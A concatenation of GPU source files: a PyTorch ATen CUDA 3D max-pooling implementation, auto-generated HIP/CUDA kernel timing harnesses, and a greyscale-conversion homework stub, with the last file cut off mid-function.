#include <ATen/AccumulateType.h> #include <ATen/native/Pool.h> #include <ATen/cuda/CUDAContext.h> #include <ATen/cuda/CUDAApplyUtils.cuh> #include <ATen/cuda/detail/TensorInfo.cuh> #include <ATen/cuda/detail/IndexUtils.cuh> #include <ATen/cuda/detail/KernelUtils.h> #include <THC/THCNumerics.cuh> #include <c10/macros/Macros.h> namespace at { namespace native { namespace { __device__ inline int min(int a, int b) { return a <= b ? a : b; } template <typename scalar_t> __global__ static void max_pool3d_with_indices_single_out_frame( scalar_t* inputData, PackedTensorAccessor<scalar_t, 4> output, PackedTensorAccessor<int64_t, 4> indices, int itime, int iheight, int iwidth, int kT, int kH, int kW, int dT, int dH, int dW, int pT, int pH, int pW, int dilationT, int dilationH, int dilationW, int offsetZ) { int oColumn = blockIdx.x * blockDim.x + threadIdx.x; int oRow = blockIdx.y * blockDim.y + threadIdx.y; int oFrame = (blockIdx.z + offsetZ) % output.size(1); // output frame/time int slice = (blockIdx.z + offsetZ) / output.size(1); // output slice/feature if (oRow < output.size(2) && oColumn < output.size(3)) { int tStart = oFrame * dT - pT; int hStart = oRow * dH - pH; int wStart = oColumn * dW - pW; int tEnd = min(tStart + (kT - 1) * dilationT + 1, itime); int hEnd = min(hStart + (kH - 1) * dilationH + 1, iheight); int wEnd = min(wStart + (kW - 1) * dilationW + 1, iwidth); while(tStart < 0) tStart += dilationT; while(hStart < 0) hStart += dilationH; while(wStart < 0) wStart += dilationW; int index = 0; int maxIndex = -1; inputData += slice * itime * iheight * iwidth; scalar_t max = THCNumerics<scalar_t>::min(); for (int t = tStart; t < tEnd; t += dilationT) { for (int h = hStart; h < hEnd; h += dilationH) { for (int w = wStart; w < wEnd; w += dilationW) { index = t * iheight * iwidth + h * iwidth + w; scalar_t val = inputData[index]; if ((max < val) || THCNumerics<scalar_t>::isnan(val)) { max = val; maxIndex = index; } } } } output[slice][oFrame][oRow][oColumn] = max; indices[slice][oFrame][oRow][oColumn] = maxIndex; } } template <int KERNEL_WIDTH, typename scalar_t> __global__ static void max_pool3d_with_indices_single_out_frame( scalar_t* inputData, PackedTensorAccessor<scalar_t, 4> output, PackedTensorAccessor<int64_t, 4> indices, int itime, int iheight, int iwidth, int kT, int kH, int dT, int dH, int dW, int pT, int pH, int pW, int dilationT, int dilationH, int dilationW, int offsetZ) { int oColumn = blockIdx.x * blockDim.x + threadIdx.x; int oRow = blockIdx.y * blockDim.y + threadIdx.y; int oFrame = (blockIdx.z + offsetZ) % output.size(1); // output frame/time int slice = (blockIdx.z + offsetZ) / output.size(1); // output slice/feature if (oRow < output.size(2) && oColumn < output.size(3)) { int tStart = oFrame * dT - pT; int hStart = oRow * dH - pH; int wStart = oColumn * dW - pW; int tEnd = min(tStart + (kT - 1) * dilationT + 1, itime); int hEnd = min(hStart + (kH - 1) * dilationH + 1, iheight); int wEnd = min(wStart + (KERNEL_WIDTH - 1) * dilationW + 1, iwidth); while(tStart < 0) tStart += dilationT; while(hStart < 0) hStart += dilationH; while(wStart < 0) wStart += dilationW; int index = 0; int maxIndex = -1; scalar_t max = THCNumerics<scalar_t>::min(); for (int t = tStart; t < tEnd; t += dilationT) { for (int h = hStart; h < hEnd; h += dilationH) { for (int w = wStart; w < wEnd; w += dilationW) { index = t * iheight * iwidth + h * iwidth + w; scalar_t val = inputData[slice * itime * iheight * iwidth + index]; if (max < val) { max = val; maxIndex = index; } } } } 
output[slice][oFrame][oRow][oColumn] = max; indices[slice][oFrame][oRow][oColumn] = maxIndex; } } #define UPDATE_OUTPUT_KERNEL_WIDTH(KW) case KW: \ max_pool3d_with_indices_single_out_frame<KW> \ <<<grid, block, 0, at::cuda::getCurrentCUDAStream()>>>( \ input_data, \ output.packed_accessor<scalar_t, 4>(), \ indices.packed_accessor<int64_t, 4>(), \ itime, iheight, iwidth, \ kT, kH, \ dT, dH, dW, \ pT, pH, pW, \ dilationT, dilationH, dilationW, offsetZ); \ break template <typename scalar_t> void max_pool3d_with_indices_out_frame( scalar_t* input_data, const Tensor& output, const Tensor& indices, int totalZ, int itime, int iheight, int iwidth, int otime, int oheight, int owidth, int kT, int kH, int kW, int dT, int dH, int dW, int pT, int pH, int pW, int dilationT, int dilationH, int dilationW) { int offsetZ = 0; dim3 block(32, 8); while (totalZ > 0) { dim3 grid(cuda::ATenCeilDiv(owidth, static_cast<int>(block.x)), cuda::ATenCeilDiv(oheight, static_cast<int>(block.y)), totalZ > 65535 ? 65535 : totalZ); switch (kW) { UPDATE_OUTPUT_KERNEL_WIDTH(1); UPDATE_OUTPUT_KERNEL_WIDTH(2); UPDATE_OUTPUT_KERNEL_WIDTH(3); UPDATE_OUTPUT_KERNEL_WIDTH(4); UPDATE_OUTPUT_KERNEL_WIDTH(5); UPDATE_OUTPUT_KERNEL_WIDTH(6); UPDATE_OUTPUT_KERNEL_WIDTH(7); default: max_pool3d_with_indices_single_out_frame <<<grid, block, 0, at::cuda::getCurrentCUDAStream()>>>( input_data, output.packed_accessor<scalar_t, 4>(), indices.packed_accessor<int64_t, 4>(), itime, iheight, iwidth, kT, kH, kW, dT, dH, dW, pT, pH, pW, dilationT, dilationH, dilationW, offsetZ); } TORCH_CHECK(cudaGetLastError() == cudaSuccess, "max_pool3d_backward_out_cuda_frame failed with error code ", cudaGetLastError()); totalZ -= 65535; offsetZ += 65535; } } #undef UPDATE_OUTPUT_KERNEL_WIDTH template <typename scalar_t> __global__ static void max_pool3d_with_indices_backward_single_out_frame( scalar_t *gradInputData, PackedTensorAccessor<scalar_t, 4> gradOutput, PackedTensorAccessor<int64_t, 4> indices, int itime, int iheight, int iwidth, int dT, int dH, int dW, int pT, int pH, int pW, int dilationT, int dilationH, int dilationW, int offsetZ) { int oColumn = blockIdx.x * blockDim.x + threadIdx.x; int oRow = blockIdx.y * blockDim.y + threadIdx.y; int oFrame = (blockIdx.z + offsetZ) % gradOutput.size(1); // output frame/time int slice = (blockIdx.z + offsetZ) / gradOutput.size(1); // output slice/feature if (oRow < gradOutput.size(2) && oColumn < gradOutput.size(3)) { int maxIndex = indices[slice][oFrame][oRow][oColumn]; if (maxIndex != -1) { atomicAdd(&gradInputData[slice * itime * iheight * iwidth + maxIndex], gradOutput[slice][oFrame][oRow][oColumn]); } } } template <typename scalar_t> void max_pool3d_with_indices_backward_out_frame( scalar_t *gradInputData, const Tensor& gradOutput, const Tensor& indices, int64_t totalZ, int itime, int iheight, int iwidth, int oheight, int owidth, int dT, int dH, int dW, int pT, int pH, int pW, int dilationT, int dilationH, int dilationW) { int offsetZ = 0; dim3 block(32, 8); while (totalZ > 0) { dim3 grid(cuda::ATenCeilDiv(owidth, static_cast<int>(block.x)), cuda::ATenCeilDiv(oheight, static_cast<int>(block.y)), totalZ > 65535 ? 
65535 : totalZ); max_pool3d_with_indices_backward_single_out_frame <<<grid, block, 0, at::cuda::getCurrentCUDAStream()>>>( gradInputData, gradOutput.packed_accessor<scalar_t, 4>(), indices.packed_accessor<int64_t, 4>(), itime, iheight, iwidth, dT, dH, dW, pT, pH, pW, dilationT, dilationH, dilationW, offsetZ); TORCH_CHECK(cudaGetLastError() == cudaSuccess, "max_pool3d_with_indices_backward_out_frame failed with error code ", cudaGetLastError()); totalZ -= 65535; offsetZ += 65535; } } void max_pool3d_with_indices_out_cuda_template( Tensor& output, Tensor& indices, const Tensor& input, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef dilation, bool ceil_mode) { TensorArg output_arg{ output, "output", 1 }; TensorArg indices_arg{ indices, "indices", 2 }; TensorArg input_arg{ input, "input", 3 }; checkAllSameGPU("max_pool3d_with_indices_out_cuda", {output_arg, indices_arg, input_arg}); // #20866, #22032: Guarantee this for the official C++ API? TORCH_CHECK((kernel_size.size() == 1 || kernel_size.size() == 3) && (stride.empty() || stride.size() == 3) && (padding.size() == 1 || padding.size() == 3) && (dilation.size() == 1 || dilation.size() == 3), "max_pool3d_with_indices: internal error: all IntArrayRef sizes must be 3"); TORCH_CHECK((input.ndimension() == 4 || input.ndimension() == 5), "non-empty 4D or 5D (batch mode) tensor expected for input"); const int kT = safe_downcast<int, int64_t>(kernel_size[0]); const int kH = kernel_size.size() == 1 ? kT : safe_downcast<int, int64_t>(kernel_size[1]); const int kW = kernel_size.size() == 1 ? kT : safe_downcast<int, int64_t>(kernel_size[2]); const int dT = stride.empty() ? kT : safe_downcast<int, int64_t>(stride[0]); const int dH = stride.empty() ? kH : safe_downcast<int, int64_t>(stride[1]); const int dW = stride.empty() ? kW : safe_downcast<int, int64_t>(stride[2]); const int pT = safe_downcast<int, int64_t>(padding[0]); const int pH = padding.size() == 1 ? pT : safe_downcast<int, int64_t>(padding[1]); const int pW = padding.size() == 1 ? pT : safe_downcast<int, int64_t>(padding[2]); const int dilationT = safe_downcast<int, int64_t>(dilation[0]); const int dilationH = dilation.size() == 1 ? dilationT : safe_downcast<int, int64_t>(dilation[1]); const int dilationW = dilation.size() == 1 ? dilationT : safe_downcast<int, int64_t>(dilation[2]); const int64_t nbatch = input.ndimension() == 5 ? input.size(-5) : 1; const int64_t nslices = input.size(-4); const int64_t itime = input.size(-3); const int64_t iheight = input.size(-2); const int64_t iwidth = input.size(-1); const int64_t otime = pooling_output_shape<int64_t>(itime, kT, pT, dT, dilationT, ceil_mode); const int64_t oheight = pooling_output_shape<int64_t>(iheight, kH, pH, dH, dilationH, ceil_mode); const int64_t owidth = pooling_output_shape<int64_t>(iwidth, kW, pW, dW, dilationW, ceil_mode); pool3d_shape_check( input, nslices, kT, kH, kW, dT, dH, dW, pT, pH, pW, dilationT, dilationH, dilationW, itime, iheight, iwidth, otime, oheight, owidth); if (input.ndimension() == 4) { output.resize_({ nslices, otime, oheight, owidth}); indices.resize_({nslices, otime, oheight, owidth}); } else { output.resize_({nbatch, nslices, otime, oheight, owidth}); indices.resize_({nbatch, nslices, otime, oheight, owidth}); } Tensor work_input = input.contiguous(); Tensor work_output = output; Tensor work_indices = indices; if (input.ndimension() == 5) { // Collapse batch and feature dimensions. 
work_input = work_input.reshape({nbatch * nslices, itime, iheight, iwidth}); work_output = work_output.reshape({nbatch * nslices, otime, oheight, owidth}); work_indices = work_indices.reshape({nbatch * nslices, otime, oheight, owidth}); } AT_DISPATCH_FLOATING_TYPES_AND_HALF( input.scalar_type(), "max_pool3d_with_indices_out_frame", [&]{ scalar_t *input_data = work_input.data<scalar_t>(); int64_t totalZ = otime * nslices * nbatch; max_pool3d_with_indices_out_frame( input_data, work_output, work_indices, totalZ, itime, iheight, iwidth, otime, oheight, owidth, kT, kH, kW, dT, dH, dW, pT, pH, pW, dilationT, dilationH, dilationW); } ); } void max_pool3d_with_indices_backward_out_cuda_template( Tensor& gradInput, const Tensor& gradOutput, const Tensor& input, const Tensor& indices, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef dilation, bool ceil_mode) { TensorArg gradInput_arg{ gradInput, "gradInput", 1 }; TensorArg gradOutput_arg{ gradOutput, "gradOutput", 2 }; TensorArg input_arg{ input, "input", 3 }; TensorArg indices_arg{ indices, "indices", 4 }; checkAllSameGPU("max_pool3d_with_indices_backward_out_cuda", {gradInput_arg, gradOutput_arg, input_arg, indices_arg}); // #20866, #22032: Guarantee this for the official C++ API? TORCH_CHECK((kernel_size.size() == 1 || kernel_size.size() == 3) && (stride.empty() || stride.size() == 3) && (padding.size() == 1 || padding.size() == 3) && (dilation.size() == 1 || dilation.size() == 3), "max_pool3d_with_indices: internal error: all IntArrayRef sizes must be 3"); TORCH_CHECK((input.ndimension() == 4 || input.ndimension() == 5), "non-empty 4D or 5D (batch mode) tensor expected for input"); TORCH_CHECK((gradOutput.ndimension() == 4 || gradOutput.ndimension() == 5), "non-empty 4D or 5D (batch mode) tensor expected for gradOutput"); // Resize and initialize result tensor. gradInput.resize_as_(input); gradInput.zero_(); const int kT = safe_downcast<int, int64_t>(kernel_size[0]); const int kH = kernel_size.size() == 1 ? kT : safe_downcast<int, int64_t>(kernel_size[1]); const int kW = kernel_size.size() == 1 ? kT : safe_downcast<int, int64_t>(kernel_size[2]); const int dT = stride.empty() ? kT : safe_downcast<int, int64_t>(stride[0]); const int dH = stride.empty() ? kH : safe_downcast<int, int64_t>(stride[1]); const int dW = stride.empty() ? kW : safe_downcast<int, int64_t>(stride[2]); const int pT = safe_downcast<int, int64_t>(padding[0]); const int pH = padding.size() == 1 ? pT : safe_downcast<int, int64_t>(padding[1]); const int pW = padding.size() == 1 ? pT : safe_downcast<int, int64_t>(padding[2]); const int dilationT = safe_downcast<int, int64_t>(dilation[0]); const int dilationH = dilation.size() == 1 ? dilationT : safe_downcast<int, int64_t>(dilation[1]); const int dilationW = dilation.size() == 1 ? dilationT : safe_downcast<int, int64_t>(dilation[2]); const int64_t nbatch = input.ndimension() == 5 ? 
input.size(-5) : 1; const int64_t nslices = input.size(-4); const int64_t otime = gradOutput.size(-3); const int64_t oheight = gradOutput.size(-2); const int64_t owidth = gradOutput.size(-1); const int64_t itime = gradInput.size(-3); const int64_t iheight = gradInput.size(-2); const int64_t iwidth = gradInput.size(-1); max_pool3d_backward_shape_check( input, gradOutput, indices, nslices, kT, kH, kW, dT, dH, dW, pT, pH, pW, dilationT, dilationH, dilationW, itime, iheight, iwidth, otime, oheight, owidth); Tensor work_grad_input = gradInput; Tensor work_grad_output = gradOutput.contiguous(); Tensor work_indices = indices.contiguous(); if (input.ndimension() == 5) { // Collapse batch and feature dimensions. work_grad_input = work_grad_input.reshape({nbatch * nslices, itime, iheight, iwidth}); work_grad_output = work_grad_output.reshape({nbatch * nslices, otime, oheight, owidth}); work_indices = work_indices.reshape({nbatch * nslices, otime, oheight, owidth}); } AT_DISPATCH_FLOATING_TYPES_AND_HALF(input.scalar_type(), "max_pool3d_with_indices_backward_out_frame", [&] { const int64_t totalZ = otime * nslices * nbatch; scalar_t *grad_input_data = work_grad_input.data<scalar_t>(); max_pool3d_with_indices_backward_out_frame( grad_input_data, work_grad_output, work_indices, totalZ, itime, iheight, iwidth, owidth, oheight, dT, dH, dW, pT, pH, pW, dilationT, dilationH, dilationW); } ); } } // namespace std::tuple<Tensor&, Tensor&> max_pool3d_with_indices_out_cuda( Tensor& output, Tensor& indices, const Tensor& input, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef dilation, bool ceil_mode) { max_pool3d_with_indices_out_cuda_template( output, indices, input, kernel_size, stride, padding, dilation, ceil_mode); return std::tuple<Tensor&, Tensor&>(output, indices); } std::tuple<Tensor, Tensor> max_pool3d_with_indices_cuda( const Tensor& input, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef dilation, bool ceil_mode) { Tensor output = at::empty({0}, input.options()); Tensor indices = at::empty({0}, input.options().dtype(kLong)); max_pool3d_with_indices_out_cuda_template( output, indices, input, kernel_size, stride, padding, dilation, ceil_mode); return std::tuple<Tensor, Tensor>(output, indices); } Tensor& max_pool3d_with_indices_backward_out_cuda( Tensor& gradInput, const Tensor& gradOutput, const Tensor& input, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef dilation, bool ceil_mode, const Tensor& indices) { max_pool3d_with_indices_backward_out_cuda_template( gradInput, gradOutput, input, indices, kernel_size, stride, padding, dilation, ceil_mode); return gradInput; } Tensor max_pool3d_with_indices_backward_cuda( const Tensor& gradOutput, const Tensor& input, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef dilation, bool ceil_mode, const Tensor& indices) { auto gradInput = at::zeros_like(input); max_pool3d_with_indices_backward_out_cuda_template( gradInput, gradOutput, input, indices, kernel_size, stride, padding, dilation, ceil_mode); return gradInput; } } // at::native } // at
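Both max_pool3d_with_indices_out_frame and its backward counterpart launch in chunks of at most 65535 z-blocks because CUDA limits gridDim.y and gridDim.z to 65535; the offsetZ argument tells each launch where its chunk of slices begins. The sketch below isolates that chunking loop, with a made-up kernel, process_slices, standing in for the pooling kernels:

#include <cstdio>
#include <cuda_runtime.h>

// Stand-in for the pooling kernels: each z-block handles one "slice" of work.
__global__ void process_slices(int offsetZ, int* max_slice) {
  if (threadIdx.x == 0 && threadIdx.y == 0) {
    // blockIdx.z + offsetZ is the global slice index, exactly as in the pooling code.
    atomicMax(max_slice, static_cast<int>(blockIdx.z) + offsetZ);
  }
}

int main() {
  int64_t totalZ = 100000;  // more slices than a single launch can cover
  int* max_slice;
  cudaMallocManaged(&max_slice, sizeof(int));
  *max_slice = -1;

  int offsetZ = 0;
  dim3 block(32, 8);
  while (totalZ > 0) {
    // gridDim.z (like gridDim.y) is capped at 65535, hence the chunking.
    dim3 grid(1, 1, totalZ > 65535 ? 65535 : static_cast<unsigned>(totalZ));
    process_slices<<<grid, block>>>(offsetZ, max_slice);
    totalZ -= 65535;
    offsetZ += 65535;
  }
  cudaDeviceSynchronize();
  printf("highest slice index reached: %d (expected 99999)\n", *max_slice);
  cudaFree(max_slice);
  return 0;
}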
1da4ef47955d91f142a1299183b6514fc180728c.hip
// !!! This is a file automatically generated by hipify!!!
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <getopt.h>
#include <hiprand/hiprand_kernel.h>
#include <stdlib.h>
#include <hip/hip_runtime.h>
#include <sys/time.h>
#include "addOne.cu"
#include <chrono>
#include <iostream>
using namespace std;
using namespace std::chrono;

int blocks_[20][2] = {{8,8},{16,16},{24,24},{32,32},{1,64},{1,128},{1,192},{1,256},{1,320},{1,384},{1,448},{1,512},{1,576},{1,640},{1,704},{1,768},{1,832},{1,896},{1,960},{1,1024}};
int matrices_[7][2] = {{240,240},{496,496},{784,784},{1016,1016},{1232,1232},{1680,1680},{2024,2024}};

int main(int argc, char **argv) {
    hipSetDevice(0);
    char* p;
    int matrix_len = strtol(argv[1], &p, 10);
    for (int matrix_looper = 0; matrix_looper < matrix_len; matrix_looper++) {
        for (int block_looper = 0; block_looper < 20; block_looper++) {
            int XSIZE = matrices_[matrix_looper][0], YSIZE = matrices_[matrix_looper][1],
                BLOCKX = blocks_[block_looper][0], BLOCKY = blocks_[block_looper][1];
            float *vals = NULL;
            hipMalloc(&vals, XSIZE*YSIZE);
            int N = XSIZE*YSIZE;
            float *out = NULL;
            hipMalloc(&out, XSIZE*YSIZE);
            int iXSIZE = XSIZE;
            int iYSIZE = YSIZE;
            while (iXSIZE % BLOCKX != 0) { iXSIZE++; }
            while (iYSIZE % BLOCKY != 0) { iYSIZE++; }
            dim3 gridBlock(iXSIZE/BLOCKX, iYSIZE/BLOCKY);
            dim3 threadBlock(BLOCKX, BLOCKY);
            hipFree(0);
            hipLaunchKernelGGL(( addOne), dim3(gridBlock), dim3(threadBlock), 0, 0, vals, N, out);
            hipDeviceSynchronize();
            for (int loop_counter = 0; loop_counter < 10; ++loop_counter) {
                hipLaunchKernelGGL(( addOne), dim3(gridBlock), dim3(threadBlock), 0, 0, vals, N, out);
            }
            auto start = steady_clock::now();
            for (int loop_counter = 0; loop_counter < 1000; loop_counter++) {
                hipLaunchKernelGGL(( addOne), dim3(gridBlock), dim3(threadBlock), 0, 0, vals, N, out);
            }
            auto end = steady_clock::now();
            auto usecs = duration_cast<duration<float, microseconds::period> >(end - start);
            cout << '[' << usecs.count() << ',' << '(' << BLOCKX << ',' << BLOCKY << ')' << ',' << '(' << XSIZE << ',' << YSIZE << ')' << ']' << endl;
        }
    }
}
1da4ef47955d91f142a1299183b6514fc180728c.cu
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <getopt.h>
#include <curand_kernel.h>
#include <stdlib.h>
#include <cuda.h>
#include <sys/time.h>
#include "addOne.cu"
#include <chrono>
#include <iostream>
using namespace std;
using namespace std::chrono;

int blocks_[20][2] = {{8,8},{16,16},{24,24},{32,32},{1,64},{1,128},{1,192},{1,256},{1,320},{1,384},{1,448},{1,512},{1,576},{1,640},{1,704},{1,768},{1,832},{1,896},{1,960},{1,1024}};
int matrices_[7][2] = {{240,240},{496,496},{784,784},{1016,1016},{1232,1232},{1680,1680},{2024,2024}};

int main(int argc, char **argv) {
    cudaSetDevice(0);
    char* p;
    int matrix_len = strtol(argv[1], &p, 10);
    for (int matrix_looper = 0; matrix_looper < matrix_len; matrix_looper++) {
        for (int block_looper = 0; block_looper < 20; block_looper++) {
            int XSIZE = matrices_[matrix_looper][0], YSIZE = matrices_[matrix_looper][1],
                BLOCKX = blocks_[block_looper][0], BLOCKY = blocks_[block_looper][1];
            float *vals = NULL;
            cudaMalloc(&vals, XSIZE*YSIZE);
            int N = XSIZE*YSIZE;
            float *out = NULL;
            cudaMalloc(&out, XSIZE*YSIZE);
            int iXSIZE = XSIZE;
            int iYSIZE = YSIZE;
            while (iXSIZE % BLOCKX != 0) { iXSIZE++; }
            while (iYSIZE % BLOCKY != 0) { iYSIZE++; }
            dim3 gridBlock(iXSIZE/BLOCKX, iYSIZE/BLOCKY);
            dim3 threadBlock(BLOCKX, BLOCKY);
            cudaFree(0);
            addOne<<<gridBlock,threadBlock>>>(vals, N, out);
            cudaDeviceSynchronize();
            for (int loop_counter = 0; loop_counter < 10; ++loop_counter) {
                addOne<<<gridBlock,threadBlock>>>(vals, N, out);
            }
            auto start = steady_clock::now();
            for (int loop_counter = 0; loop_counter < 1000; loop_counter++) {
                addOne<<<gridBlock,threadBlock>>>(vals, N, out);
            }
            auto end = steady_clock::now();
            auto usecs = duration_cast<duration<float, microseconds::period> >(end - start);
            cout << '[' << usecs.count() << ',' << '(' << BLOCKX << ',' << BLOCKY << ')' << ',' << '(' << XSIZE << ',' << YSIZE << ')' << ']' << endl;
        }
    }
}
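The harness above only pulls in "addOne.cu", which is not reproduced in this dump; the following is a hypothetical sketch of an element-wise kernel matching the call site addOne(vals, N, out), together with a note on buffer sizing.

// Hypothetical kernel body (assumed semantics: add 1.0f to each element).
__global__ void addOne(float *vals, int N, float *out) {
    // Flatten the harness's 2D grid / 2D block launch into a 1D index.
    int idx = (blockIdx.y * gridDim.x + blockIdx.x) * (blockDim.x * blockDim.y)
            + threadIdx.y * blockDim.x + threadIdx.x;
    if (idx < N) {
        out[idx] = vals[idx] + 1.0f;
    }
}

// Sizing note: cudaMalloc takes a byte count, so buffers meant to hold N floats
// would normally be allocated as
//     cudaMalloc(&vals, N * sizeof(float));
//     cudaMalloc(&out,  N * sizeof(float));
// whereas the generated harness passes XSIZE*YSIZE, i.e. N bytes (N/4 floats).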
ed0af811e4bb375131531014f4086cf560bb77d0.hip
// !!! This is a file automatically generated by hipify!!!
#include "hip/hip_runtime.h"
// Color to Greyscale Conversion
//A common way to represent color images is known as RGBA - the color
//is specified by how much Red, Green, and Blue is in it.
//The 'A' stands for Alpha and is used for transparency; it will be
//ignored in this homework.
//Each channel Red, Blue, Green, and Alpha is represented by one byte.
//Since we are using one byte for each color there are 256 different
//possible values for each color. This means we use 4 bytes per pixel.
//Greyscale images are represented by a single intensity value per pixel
//which is one byte in size.
//To convert an image from color to grayscale one simple method is to
//set the intensity to the average of the RGB channels. But we will
//use a more sophisticated method that takes into account how the eye
//perceives color and weights the channels unequally.
//The eye responds most strongly to green followed by red and then blue.
//The NTSC (National Television System Committee) recommends the following
//formula for color to greyscale conversion:
//I = .299f * R + .587f * G + .114f * B
//Notice the trailing f's on the numbers which indicate that they are
//single precision floating point constants and not double precision
//constants.

#include "reference_calc.cpp"
#include "utils.h"
#include <stdio.h>

__global__
void rgba_to_greyscale(const uchar4* const rgbaImage,
                       unsigned char* const greyImage,
                       int numRows, int numCols)
{
  //TODO
  //Fill in the kernel to convert from color to greyscale
  //the mapping from components of a uchar4 to RGBA is:
  // .x -> R ; .y -> G ; .z -> B ; .w -> A
  //
  //The output (greyImage) at each pixel should be the result of
  //applying the formula: output = .299f * R + .587f * G + .114f * B;
  //Note: We will be ignoring the alpha channel for this conversion
  //First create a mapping from the 2D block and grid locations
  //to an absolute 2D location in the image, then use that to
  //calculate a 1D offset
}

void your_rgba_to_greyscale(const uchar4 * const h_rgbaImage, uchar4 * const d_rgbaImage,
                            unsigned char* const d_greyImage, size_t numRows, size_t numCols)
{
  //You must fill in the correct sizes for the blockSize and gridSize
  //currently only one block with one thread is being launched
  const dim3 blockSize(1, 1, 1);  //TODO
  const dim3 gridSize( 1, 1, 1);  //TODO
  hipLaunchKernelGGL(( rgba_to_greyscale), dim3(gridSize), dim3(blockSize), 0, 0, d_rgbaImage, d_greyImage, numRows, numCols);

  hipDeviceSynchronize();
  checkCudaErrors(hipGetLastError());
}
ed0af811e4bb375131531014f4086cf560bb77d0.cu
// Color to Greyscale Conversion
//A common way to represent color images is known as RGBA - the color
//is specified by how much Red, Green, and Blue is in it.
//The 'A' stands for Alpha and is used for transparency; it will be
//ignored in this homework.
//Each channel Red, Blue, Green, and Alpha is represented by one byte.
//Since we are using one byte for each color there are 256 different
//possible values for each color. This means we use 4 bytes per pixel.
//Greyscale images are represented by a single intensity value per pixel
//which is one byte in size.
//To convert an image from color to grayscale one simple method is to
//set the intensity to the average of the RGB channels. But we will
//use a more sophisticated method that takes into account how the eye
//perceives color and weights the channels unequally.
//The eye responds most strongly to green followed by red and then blue.
//The NTSC (National Television System Committee) recommends the following
//formula for color to greyscale conversion:
//I = .299f * R + .587f * G + .114f * B
//Notice the trailing f's on the numbers which indicate that they are
//single precision floating point constants and not double precision
//constants.

#include "reference_calc.cpp"
#include "utils.h"
#include <stdio.h>

__global__
void rgba_to_greyscale(const uchar4* const rgbaImage,
                       unsigned char* const greyImage,
                       int numRows, int numCols)
{
  //TODO
  //Fill in the kernel to convert from color to greyscale
  //the mapping from components of a uchar4 to RGBA is:
  // .x -> R ; .y -> G ; .z -> B ; .w -> A
  //
  //The output (greyImage) at each pixel should be the result of
  //applying the formula: output = .299f * R + .587f * G + .114f * B;
  //Note: We will be ignoring the alpha channel for this conversion
  //First create a mapping from the 2D block and grid locations
  //to an absolute 2D location in the image, then use that to
  //calculate a 1D offset
}

void your_rgba_to_greyscale(const uchar4 * const h_rgbaImage, uchar4 * const d_rgbaImage,
                            unsigned char* const d_greyImage, size_t numRows, size_t numCols)
{
  //You must fill in the correct sizes for the blockSize and gridSize
  //currently only one block with one thread is being launched
  const dim3 blockSize(1, 1, 1);  //TODO
  const dim3 gridSize( 1, 1, 1);  //TODO
  rgba_to_greyscale<<<gridSize, blockSize>>>(d_rgbaImage, d_greyImage, numRows, numCols);

  cudaDeviceSynchronize();
  checkCudaErrors(cudaGetLastError());
}
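One possible completion of the TODOs above, offered as a sketch rather than the assignment's reference solution: map the 2D block and grid coordinates to a pixel, guard against out-of-range threads, and apply the NTSC weights quoted in the comments.

__global__ void rgba_to_greyscale_sketch(const uchar4* const rgbaImage,
                                         unsigned char* const greyImage,
                                         int numRows, int numCols)
{
  const int col = blockIdx.x * blockDim.x + threadIdx.x;   // image column
  const int row = blockIdx.y * blockDim.y + threadIdx.y;   // image row
  if (col >= numCols || row >= numRows) return;            // skip padding threads
  const int offset = row * numCols + col;                  // 1D offset
  const uchar4 px = rgbaImage[offset];                     // .x=R .y=G .z=B .w=A
  greyImage[offset] =
      static_cast<unsigned char>(.299f * px.x + .587f * px.y + .114f * px.z);
}

// A matching launch configuration for your_rgba_to_greyscale could be:
//   const dim3 blockSize(16, 16, 1);
//   const dim3 gridSize((numCols + blockSize.x - 1) / blockSize.x,
//                       (numRows + blockSize.y - 1) / blockSize.y, 1);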
43e68550dc66257b393c79b64b0e59eaedc33496.hip
// !!! This is a file automatically generated by hipify!!!
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <getopt.h>
#include <hiprand/hiprand_kernel.h>
#include <stdlib.h>
#include <hip/hip_runtime.h>
#include <sys/time.h>
#include "_l1reg.cu"
#include <chrono>
#include <iostream>
using namespace std;
using namespace std::chrono;

int blocks_[20][2] = {{8,8},{16,16},{24,24},{32,32},{1,64},{1,128},{1,192},{1,256},{1,320},{1,384},{1,448},{1,512},{1,576},{1,640},{1,704},{1,768},{1,832},{1,896},{1,960},{1,1024}};
int matrices_[7][2] = {{240,240},{496,496},{784,784},{1016,1016},{1232,1232},{1680,1680},{2024,2024}};

int main(int argc, char **argv) {
    hipSetDevice(0);
    char* p;
    int matrix_len = strtol(argv[1], &p, 10);
    for (int matrix_looper = 0; matrix_looper < matrix_len; matrix_looper++) {
        for (int block_looper = 0; block_looper < 20; block_looper++) {
            int XSIZE = matrices_[matrix_looper][0], YSIZE = matrices_[matrix_looper][1],
                BLOCKX = blocks_[block_looper][0], BLOCKY = blocks_[block_looper][1];
            int n = XSIZE*YSIZE;
            float l1 = 1;
            float *w = NULL;
            hipMalloc(&w, XSIZE*YSIZE);
            float *dw = NULL;
            hipMalloc(&dw, XSIZE*YSIZE);
            int iXSIZE = XSIZE;
            int iYSIZE = YSIZE;
            while (iXSIZE % BLOCKX != 0) { iXSIZE++; }
            while (iYSIZE % BLOCKY != 0) { iYSIZE++; }
            dim3 gridBlock(iXSIZE/BLOCKX, iYSIZE/BLOCKY);
            dim3 threadBlock(BLOCKX, BLOCKY);
            hipFree(0);
            hipLaunchKernelGGL(( _l1reg), dim3(gridBlock), dim3(threadBlock), 0, 0, n, l1, w, dw);
            hipDeviceSynchronize();
            for (int loop_counter = 0; loop_counter < 10; ++loop_counter) {
                hipLaunchKernelGGL(( _l1reg), dim3(gridBlock), dim3(threadBlock), 0, 0, n, l1, w, dw);
            }
            auto start = steady_clock::now();
            for (int loop_counter = 0; loop_counter < 1000; loop_counter++) {
                hipLaunchKernelGGL(( _l1reg), dim3(gridBlock), dim3(threadBlock), 0, 0, n, l1, w, dw);
            }
            auto end = steady_clock::now();
            auto usecs = duration_cast<duration<float, microseconds::period> >(end - start);
